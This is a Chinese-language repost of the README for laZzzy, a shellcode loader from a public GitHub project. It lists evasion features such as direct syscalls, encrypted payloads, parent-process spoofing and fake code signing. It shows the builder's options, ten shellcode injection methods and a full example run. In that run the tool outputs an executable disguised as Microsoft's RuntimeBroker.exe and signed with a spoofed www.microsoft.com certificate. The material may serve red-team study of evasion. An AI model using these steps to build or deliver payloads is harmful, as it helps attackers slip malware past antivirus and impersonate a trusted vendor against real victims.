特征
-
直接系统调用和本机 (
Nt*
) 函数(不是所有函数,但大多数) -
导入地址表 (IAT) 规避
-
加密有效负载(XOR 和 AES)
-
随机生成的密钥
-
x90
使用 NOPS ( )自动填充有效负载(如有必要) -
有效负载的逐字节内存解密
-
XOR 加密字符串
-
PPID欺骗
-
阻止非 Microsoft 签名的 DLL
-
(可选)克隆PE图标和属性
-
(可选)使用欺骗性证书进行代码签名
带有 Visual Studio 和以下组件的 Windows 机器,可以从Visual Studio Installer
>Individual Components
安装:
-
C++ Clang Compiler for Windows
and
C++ Clang-cl for build tools
ClickOnce Publishing
(venv) PS C:MalDevlaZzzy> python3 .builder.py -h
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]
options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\Windows\System32\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\Windows\System32\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)
shellcode execution method:
1 Early-bird APC Queue (requires sacrificial proces)
2 Thread Hijacking (requires sacrificial proces)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard
例子:
执行builder.py
并提供必要的数据
(venv) PS C:MalDevlaZzzy> python3 .builder.py -s .calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\Windows\System32\notepad.exe -d www.microsoft.com -b C:\Windows\System32\mmc.exe
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
[ ] XOR-encrypting payload with
[ ] Key: d3b666606468293dfa21ce2ff25e86f6
[ ] AES-encrypting payload with
[ ] IV: f96312f17a1a9919c74b633c5f861fe5
[6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec ] Key:
[using ] Modifying template
[ ] Technique: Early-bird APC Queue
[ ] Process to inject: None
[ ] Process to spawn: C:\Windows\System32\RuntimeBroker.exe
[ ] Parent process to spoof: svchost.exe
[ ] Spoofing metadata
[ ] Binary: C:\Windows\System32\RuntimeBroker.exe
[ ] CompanyName: Microsoft Corporation
[ ] FileDescription: Runtime Broker
[10.0.22621.608 (WinBuild.160101.0800) ] FileVersion:
[ ] InternalName: RuntimeBroker.exe
[ ] LegalCopyright: © Microsoft Corporation. All rights reserved.
[ ] OriginalFilename: RuntimeBroker.exe
[ ] ProductName: Microsoft® Windows® Operating System
[10.0.22621.608 ] ProductVersion:
[ ] Compiling project
[ ] Compiled executable: C:MalDevlaZzzyloaderx64ReleaselaZzzy.exe
[ ] Signing binary with spoofed cert
[ ] Domain: www.microsoft.com
[2 ] Version:
[33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6 ] Serial:
[ ] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[06 ] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA
[04 2022 ] Not Before: October
[29 2023 ] Not After: September
[ ] PFX file: C:MalDevlaZzzyoutputwww.microsoft.com.pfx
[ ] All done!
[ ] Output file: C:MalDevlaZzzyoutputRuntimeBroker.exe
Shellcode 执行技术
-
Early-bird APC Queue (需要牺牲过程)
-
线程劫持(需要牺牲进程)
-
KernelCallbackTable (需要具有 GUI 的牺牲进程)
-
截面视图映射
-
线程暂停
-
LineDDA回调
-
EnumSystemGeoID 回调
-
光纤本地存储 (FLS) 回调
-
设置定时器
-
剪贴板
https://github.com/capt-meelo/laZzzy
原文始发于微信公众号(Khan安全攻防实验室):laZzzy – shellcode 加载器